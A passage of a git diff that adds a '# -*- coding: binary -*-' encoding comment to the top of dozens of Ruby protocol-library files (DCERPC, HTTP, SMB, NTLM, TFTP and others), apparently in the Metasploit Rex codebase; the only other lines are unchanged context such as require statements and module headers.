index a2e2a99298..0ced7af783 100755
--- a/lib/rex/proto/dcerpc/client.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/client.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/exceptions.rb b/lib/rex/proto/dcerpc/exceptions.rb
index 3d92c209d3..f9b204edd3 100644
--- a/lib/rex/proto/dcerpc/exceptions.rb
+++ b/lib/rex/proto/dcerpc/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/handle.rb b/lib/rex/proto/dcerpc/handle.rb
index e26dded45e..661216a76b 100644
--- a/lib/rex/proto/dcerpc/handle.rb
+++ b/lib/rex/proto/dcerpc/handle.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/handle.rb.ut.rb b/lib/rex/proto/dcerpc/handle.rb.ut.rb
index 720ee0252b..e25031923f 100644
--- a/lib/rex/proto/dcerpc/handle.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/handle.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/ndr.rb b/lib/rex/proto/dcerpc/ndr.rb
index 5f67746b8f..d07bd0e0f5 100644
--- a/lib/rex/proto/dcerpc/ndr.rb
+++ b/lib/rex/proto/dcerpc/ndr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/text"
module Rex
diff --git a/lib/rex/proto/dcerpc/ndr.rb.ut.rb b/lib/rex/proto/dcerpc/ndr.rb.ut.rb
index 07b30d4ed8..70529d0458 100644
--- a/lib/rex/proto/dcerpc/ndr.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/ndr.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/packet.rb b/lib/rex/proto/dcerpc/packet.rb
index d28623c8e8..463a8a8be7 100644
--- a/lib/rex/proto/dcerpc/packet.rb
+++ b/lib/rex/proto/dcerpc/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/packet.rb.ut.rb b/lib/rex/proto/dcerpc/packet.rb.ut.rb
index 95bf456195..a3c62554b0 100644
--- a/lib/rex/proto/dcerpc/packet.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/packet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/response.rb b/lib/rex/proto/dcerpc/response.rb
index 5898381811..cf44ea500f 100644
--- a/lib/rex/proto/dcerpc/response.rb
+++ b/lib/rex/proto/dcerpc/response.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/dcerpc/uuid'
require 'rex/proto/dcerpc/exceptions'
diff --git a/lib/rex/proto/dcerpc/response.rb.ut.rb b/lib/rex/proto/dcerpc/response.rb.ut.rb
index 8ca0aa911b..1914e07170 100644
--- a/lib/rex/proto/dcerpc/response.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/response.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/uuid.rb b/lib/rex/proto/dcerpc/uuid.rb
index 10e6993048..f9c39e3279 100644
--- a/lib/rex/proto/dcerpc/uuid.rb
+++ b/lib/rex/proto/dcerpc/uuid.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/uuid.rb.ut.rb b/lib/rex/proto/dcerpc/uuid.rb.ut.rb
index c42e30aa30..e1f36c4ee9 100644
--- a/lib/rex/proto/dcerpc/uuid.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/uuid.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dhcp.rb b/lib/rex/proto/dhcp.rb
index 57fd3791bb..9a8a036f84 100644
--- a/lib/rex/proto/dhcp.rb
+++ b/lib/rex/proto/dhcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
#
# DHCP Server support written by scriptjunkie
diff --git a/lib/rex/proto/dhcp/constants.rb b/lib/rex/proto/dhcp/constants.rb
index c58f2ea248..c99d74f1bc 100644
--- a/lib/rex/proto/dhcp/constants.rb
+++ b/lib/rex/proto/dhcp/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/proto/dhcp'
diff --git a/lib/rex/proto/dhcp/server.rb b/lib/rex/proto/dhcp/server.rb
index 34e7733a34..abfd39d2d0 100644
--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/socket'
diff --git a/lib/rex/proto/drda.rb b/lib/rex/proto/drda.rb
index 1e66b787aa..751b83a4d4 100644
--- a/lib/rex/proto/drda.rb
+++ b/lib/rex/proto/drda.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda/constants'
require 'rex/proto/drda/packet'
require 'rex/proto/drda/utils'
diff --git a/lib/rex/proto/drda.rb.ts.rb b/lib/rex/proto/drda.rb.ts.rb
index 1c2823ea9b..1e4bcbe7c2 100644
--- a/lib/rex/proto/drda.rb.ts.rb
+++ b/lib/rex/proto/drda.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/test'
diff --git a/lib/rex/proto/drda/constants.rb b/lib/rex/proto/drda/constants.rb
index 7254bade3b..bc6018937f 100644
--- a/lib/rex/proto/drda/constants.rb
+++ b/lib/rex/proto/drda/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda'
module Rex
diff --git a/lib/rex/proto/drda/constants.rb.ut.rb b/lib/rex/proto/drda/constants.rb.ut.rb
index 8bb74303eb..be3e4a82a0 100644
--- a/lib/rex/proto/drda/constants.rb.ut.rb
+++ b/lib/rex/proto/drda/constants.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/drda/packet.rb b/lib/rex/proto/drda/packet.rb
index 4db613a494..e3519f0f02 100644
--- a/lib/rex/proto/drda/packet.rb
+++ b/lib/rex/proto/drda/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda'
module Rex
diff --git a/lib/rex/proto/drda/packet.rb.ut.rb b/lib/rex/proto/drda/packet.rb.ut.rb
index c3792effed..20217c0150 100644
--- a/lib/rex/proto/drda/packet.rb.ut.rb
+++ b/lib/rex/proto/drda/packet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/drda/utils.rb b/lib/rex/proto/drda/utils.rb
index cd877e344a..fab4d6da78 100644
--- a/lib/rex/proto/drda/utils.rb
+++ b/lib/rex/proto/drda/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda'
module Rex
diff --git a/lib/rex/proto/drda/utils.rb.ut.rb b/lib/rex/proto/drda/utils.rb.ut.rb
index b7f6fa23fa..fc251f4bff 100644
--- a/lib/rex/proto/drda/utils.rb.ut.rb
+++ b/lib/rex/proto/drda/utils.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http.rb b/lib/rex/proto/http.rb
index a4e0e06071..1ff65061ec 100644
--- a/lib/rex/proto/http.rb
+++ b/lib/rex/proto/http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http/packet'
require 'rex/proto/http/request'
require 'rex/proto/http/response'
diff --git a/lib/rex/proto/http.rb.ts.rb b/lib/rex/proto/http.rb.ts.rb
index 7697ea7d8d..8e241fb401 100644
--- a/lib/rex/proto/http.rb.ts.rb
+++ b/lib/rex/proto/http.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb
index b5c328e5a8..5f0dcfa0d9 100644
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/proto/http'
require 'rex/text'
diff --git a/lib/rex/proto/http/client.rb.ut.rb b/lib/rex/proto/http/client.rb.ut.rb
index d6a3ab0b45..bb57ff16f9 100644
--- a/lib/rex/proto/http/client.rb.ut.rb
+++ b/lib/rex/proto/http/client.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/handler.rb b/lib/rex/proto/http/handler.rb
index ed35775874..ec78464411 100644
--- a/lib/rex/proto/http/handler.rb
+++ b/lib/rex/proto/http/handler.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module Http
diff --git a/lib/rex/proto/http/handler/erb.rb b/lib/rex/proto/http/handler/erb.rb
index 5f2e3d6551..0719d9cbea 100644
--- a/lib/rex/proto/http/handler/erb.rb
+++ b/lib/rex/proto/http/handler/erb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'erb'
include ERB::Util
diff --git a/lib/rex/proto/http/handler/erb.rb.ut.rb b/lib/rex/proto/http/handler/erb.rb.ut.rb
index 24b4584020..97d808c6ff 100644
--- a/lib/rex/proto/http/handler/erb.rb.ut.rb
+++ b/lib/rex/proto/http/handler/erb.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/rex/proto/http/handler/proc.rb b/lib/rex/proto/http/handler/proc.rb
index 51ea7492d5..03e66a26c2 100644
--- a/lib/rex/proto/http/handler/proc.rb
+++ b/lib/rex/proto/http/handler/proc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'erb'
module Rex
diff --git a/lib/rex/proto/http/handler/proc.rb.ut.rb b/lib/rex/proto/http/handler/proc.rb.ut.rb
index bc572c2a16..26332ab0a7 100644
--- a/lib/rex/proto/http/handler/proc.rb.ut.rb
+++ b/lib/rex/proto/http/handler/proc.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/rex/proto/http/header.rb b/lib/rex/proto/http/header.rb
index 5bd4547ca7..e751c64812 100644
--- a/lib/rex/proto/http/header.rb
+++ b/lib/rex/proto/http/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
module Rex
diff --git a/lib/rex/proto/http/header.rb.ut.rb b/lib/rex/proto/http/header.rb.ut.rb
index 7096b6efd4..719d762789 100644
--- a/lib/rex/proto/http/header.rb.ut.rb
+++ b/lib/rex/proto/http/header.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/packet.rb b/lib/rex/proto/http/packet.rb
index 089f80b6d5..d814523745 100644
--- a/lib/rex/proto/http/packet.rb
+++ b/lib/rex/proto/http/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
module Rex
diff --git a/lib/rex/proto/http/packet.rb.ut.rb b/lib/rex/proto/http/packet.rb.ut.rb
index e04f3ee813..193d892b61 100644
--- a/lib/rex/proto/http/packet.rb.ut.rb
+++ b/lib/rex/proto/http/packet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/request.rb b/lib/rex/proto/http/request.rb
index 088edc4a92..2ff4c6b13a 100644
--- a/lib/rex/proto/http/request.rb
+++ b/lib/rex/proto/http/request.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'uri'
require 'rex/proto/http'
diff --git a/lib/rex/proto/http/request.rb.ut.rb b/lib/rex/proto/http/request.rb.ut.rb
index 9c23ee8b12..e7cf091a6c 100644
--- a/lib/rex/proto/http/request.rb.ut.rb
+++ b/lib/rex/proto/http/request.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb
index 8fa453b639..1d7414e310 100644
--- a/lib/rex/proto/http/response.rb
+++ b/lib/rex/proto/http/response.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
module Rex
diff --git a/lib/rex/proto/http/response.rb.ut.rb b/lib/rex/proto/http/response.rb.ut.rb
index 83553194c1..085d898203 100644
--- a/lib/rex/proto/http/response.rb.ut.rb
+++ b/lib/rex/proto/http/response.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/server.rb b/lib/rex/proto/http/server.rb
index 077c15c707..b10dc1e8a5 100644
--- a/lib/rex/proto/http/server.rb
+++ b/lib/rex/proto/http/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/proto/http'
require 'rex/proto/http/handler'
diff --git a/lib/rex/proto/http/server.rb.ut.rb b/lib/rex/proto/http/server.rb.ut.rb
index c656819e0c..c8307ebc5f 100644
--- a/lib/rex/proto/http/server.rb.ut.rb
+++ b/lib/rex/proto/http/server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/iax2.rb b/lib/rex/proto/iax2.rb
index bcf5576de8..47f3cd7f6f 100644
--- a/lib/rex/proto/iax2.rb
+++ b/lib/rex/proto/iax2.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/client'
diff --git a/lib/rex/proto/iax2/call.rb b/lib/rex/proto/iax2/call.rb
index e8e8f315f1..80c1a2c6f9 100644
--- a/lib/rex/proto/iax2/call.rb
+++ b/lib/rex/proto/iax2/call.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/client.rb b/lib/rex/proto/iax2/client.rb
index 9d151bff31..9ae41539c2 100644
--- a/lib/rex/proto/iax2/client.rb
+++ b/lib/rex/proto/iax2/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/constants'
require 'rex/proto/iax2/codecs'
require 'rex/proto/iax2/call'
diff --git a/lib/rex/proto/iax2/codecs.rb b/lib/rex/proto/iax2/codecs.rb
index 2d6fc2d0f5..dbafe4a482 100644
--- a/lib/rex/proto/iax2/codecs.rb
+++ b/lib/rex/proto/iax2/codecs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/codecs/g711'
require 'rex/proto/iax2/codecs/mulaw'
require 'rex/proto/iax2/codecs/alaw'
diff --git a/lib/rex/proto/iax2/codecs/alaw.rb b/lib/rex/proto/iax2/codecs/alaw.rb
index c2a2d43b43..f011356719 100644
--- a/lib/rex/proto/iax2/codecs/alaw.rb
+++ b/lib/rex/proto/iax2/codecs/alaw.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/codecs/g711.rb b/lib/rex/proto/iax2/codecs/g711.rb
index c35930c9f8..bfbb2e0498 100644
--- a/lib/rex/proto/iax2/codecs/g711.rb
+++ b/lib/rex/proto/iax2/codecs/g711.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/codecs/mulaw.rb b/lib/rex/proto/iax2/codecs/mulaw.rb
index 78d459b15e..25131c7149 100644
--- a/lib/rex/proto/iax2/codecs/mulaw.rb
+++ b/lib/rex/proto/iax2/codecs/mulaw.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/constants.rb b/lib/rex/proto/iax2/constants.rb
index 15a829c349..bc12c8608d 100644
--- a/lib/rex/proto/iax2/constants.rb
+++ b/lib/rex/proto/iax2/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/natpmp.rb b/lib/rex/proto/natpmp.rb
index 4e668cedfb..cf41512b54 100644
--- a/lib/rex/proto/natpmp.rb
+++ b/lib/rex/proto/natpmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# NAT-PMP protocol support
diff --git a/lib/rex/proto/natpmp/constants.rb b/lib/rex/proto/natpmp/constants.rb
index 19e0aa2ccc..c0d119a8c1 100644
--- a/lib/rex/proto/natpmp/constants.rb
+++ b/lib/rex/proto/natpmp/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# NAT-PMP constants
diff --git a/lib/rex/proto/natpmp/packet.rb b/lib/rex/proto/natpmp/packet.rb
index ef91dccbfe..25d6aa72e2 100644
--- a/lib/rex/proto/natpmp/packet.rb
+++ b/lib/rex/proto/natpmp/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# NAT-PMP protocol support
diff --git a/lib/rex/proto/ntlm.rb b/lib/rex/proto/ntlm.rb
index ff416f3733..4d4a52d4de 100644
--- a/lib/rex/proto/ntlm.rb
+++ b/lib/rex/proto/ntlm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/exceptions'
require 'rex/proto/ntlm/crypt'
diff --git a/lib/rex/proto/ntlm.rb.ut.rb b/lib/rex/proto/ntlm.rb.ut.rb
index a19e432d56..3eee949b36 100644
--- a/lib/rex/proto/ntlm.rb.ut.rb
+++ b/lib/rex/proto/ntlm.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/proto/ntlm/base.rb b/lib/rex/proto/ntlm/base.rb
index 8ea76e7870..94c027c91b 100644
--- a/lib/rex/proto/ntlm/base.rb
+++ b/lib/rex/proto/ntlm/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# An NTLM Authentication Library for Ruby
#
diff --git a/lib/rex/proto/ntlm/constants.rb b/lib/rex/proto/ntlm/constants.rb
index 0149ada048..8a78ddae8a 100644
--- a/lib/rex/proto/ntlm/constants.rb
+++ b/lib/rex/proto/ntlm/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module NTLM
diff --git a/lib/rex/proto/ntlm/crypt.rb b/lib/rex/proto/ntlm/crypt.rb
index 63bd1168b8..f7a99efcfb 100644
--- a/lib/rex/proto/ntlm/crypt.rb
+++ b/lib/rex/proto/ntlm/crypt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# An NTLM Authentication Library for Ruby
#
diff --git a/lib/rex/proto/ntlm/exceptions.rb b/lib/rex/proto/ntlm/exceptions.rb
index 2298ecced2..81e5f849f1 100644
--- a/lib/rex/proto/ntlm/exceptions.rb
+++ b/lib/rex/proto/ntlm/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module NTLM
diff --git a/lib/rex/proto/ntlm/message.rb b/lib/rex/proto/ntlm/message.rb
index 2c8485fba6..a8c678e877 100644
--- a/lib/rex/proto/ntlm/message.rb
+++ b/lib/rex/proto/ntlm/message.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# An NTLM Authentication Library for Ruby
#
diff --git a/lib/rex/proto/ntlm/utils.rb b/lib/rex/proto/ntlm/utils.rb
index 379c1448cc..b72c178d6d 100644
--- a/lib/rex/proto/ntlm/utils.rb
+++ b/lib/rex/proto/ntlm/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/crypt'
require 'rex/proto/ntlm/exceptions'
diff --git a/lib/rex/proto/proxy/socks4a.rb b/lib/rex/proto/proxy/socks4a.rb
index 211d870e15..abc68cb02c 100644
--- a/lib/rex/proto/proxy/socks4a.rb
+++ b/lib/rex/proto/proxy/socks4a.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# sf - Sept 2010
#
diff --git a/lib/rex/proto/rfb.rb b/lib/rex/proto/rfb.rb
index 1a9aeb0ed9..53e493e4df 100644
--- a/lib/rex/proto/rfb.rb
+++ b/lib/rex/proto/rfb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/rfb.rb.ut.rb b/lib/rex/proto/rfb.rb.ut.rb
index 3333e61d04..d9771e7516 100644
--- a/lib/rex/proto/rfb.rb.ut.rb
+++ b/lib/rex/proto/rfb.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb
index d6fcc0f7ca..216e953945 100644
--- a/lib/rex/proto/rfb/cipher.rb
+++ b/lib/rex/proto/rfb/cipher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb
index 749c70d0be..723a067034 100644
--- a/lib/rex/proto/rfb/client.rb
+++ b/lib/rex/proto/rfb/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb
index be253a470c..fc5517d8a3 100644
--- a/lib/rex/proto/rfb/constants.rb
+++ b/lib/rex/proto/rfb/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/smb.rb b/lib/rex/proto/smb.rb
index 29c4ce002c..e62785e05f 100644
--- a/lib/rex/proto/smb.rb
+++ b/lib/rex/proto/smb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/smb/constants'
require 'rex/proto/smb/exceptions'
require 'rex/proto/smb/evasions'
diff --git a/lib/rex/proto/smb.rb.ts.rb b/lib/rex/proto/smb.rb.ts.rb
index cc67bcaa10..26abbcde90 100644
--- a/lib/rex/proto/smb.rb.ts.rb
+++ b/lib/rex/proto/smb.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/test'
require 'rex/proto/smb/client.rb.ut.rb'
diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb
index adb5525681..583b90b2a7 100644
--- a/lib/rex/proto/smb/client.rb
+++ b/lib/rex/proto/smb/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/client.rb.ut.rb b/lib/rex/proto/smb/client.rb.ut.rb
index cdfde5ca0c..e4f3ae046a 100644
--- a/lib/rex/proto/smb/client.rb.ut.rb
+++ b/lib/rex/proto/smb/client.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb
index 204ae788cb..e03085830a 100644
--- a/lib/rex/proto/smb/constants.rb
+++ b/lib/rex/proto/smb/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/constants.rb.ut.rb b/lib/rex/proto/smb/constants.rb.ut.rb
index 72440bda69..e0db0419df 100644
--- a/lib/rex/proto/smb/constants.rb.ut.rb
+++ b/lib/rex/proto/smb/constants.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/smb/crypt.rb b/lib/rex/proto/smb/crypt.rb
index 6c744acc0d..924c4be5e1 100644
--- a/lib/rex/proto/smb/crypt.rb
+++ b/lib/rex/proto/smb/crypt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
module Rex
diff --git a/lib/rex/proto/smb/evasions.rb b/lib/rex/proto/smb/evasions.rb
index 2e68c9af5d..a3658a9922 100644
--- a/lib/rex/proto/smb/evasions.rb
+++ b/lib/rex/proto/smb/evasions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/exceptions.rb b/lib/rex/proto/smb/exceptions.rb
index 4f576bbc75..48e07f225e 100644
--- a/lib/rex/proto/smb/exceptions.rb
+++ b/lib/rex/proto/smb/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/simpleclient.rb b/lib/rex/proto/smb/simpleclient.rb
index 183c639447..454a3c694e 100644
--- a/lib/rex/proto/smb/simpleclient.rb
+++ b/lib/rex/proto/smb/simpleclient.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/simpleclient.rb.ut.rb b/lib/rex/proto/smb/simpleclient.rb.ut.rb
index f3b0593662..e946f08278 100644
--- a/lib/rex/proto/smb/simpleclient.rb.ut.rb
+++ b/lib/rex/proto/smb/simpleclient.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/smb/utils.rb b/lib/rex/proto/smb/utils.rb
index c4597c05a4..f9cb3681c0 100644
--- a/lib/rex/proto/smb/utils.rb
+++ b/lib/rex/proto/smb/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/proto/smb/constants'
diff --git a/lib/rex/proto/smb/utils.rb.ut.rb b/lib/rex/proto/smb/utils.rb.ut.rb
index 8e64cdc346..6cc882ac19 100644
--- a/lib/rex/proto/smb/utils.rb.ut.rb
+++ b/lib/rex/proto/smb/utils.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/sunrpc.rb b/lib/rex/proto/sunrpc.rb
index e6a3eb017d..3475c357f5 100644
--- a/lib/rex/proto/sunrpc.rb
+++ b/lib/rex/proto/sunrpc.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/proto/sunrpc/client'
diff --git a/lib/rex/proto/sunrpc/client.rb b/lib/rex/proto/sunrpc/client.rb
index ea90b06784..3f713db516 100644
--- a/lib/rex/proto/sunrpc/client.rb
+++ b/lib/rex/proto/sunrpc/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/encoder/xdr'
diff --git a/lib/rex/proto/tftp.rb b/lib/rex/proto/tftp.rb
index 16bf85e582..2ed08237e4 100644
--- a/lib/rex/proto/tftp.rb
+++ b/lib/rex/proto/tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
#
# TFTP Server implementation according to:
diff --git a/lib/rex/proto/tftp/client.rb b/lib/rex/proto/tftp/client.rb
index f111f98733..90dcf85717 100644
--- a/lib/rex/proto/tftp/client.rb
+++ b/lib/rex/proto/tftp/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/proto/tftp'
require 'tempfile'
diff --git a/lib/rex/proto/tftp/constants.rb b/lib/rex/proto/tftp/constants.rb
index f1e8e813be..d29894c8bf 100644
--- a/lib/rex/proto/tftp/constants.rb
+++ b/lib/rex/proto/tftp/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
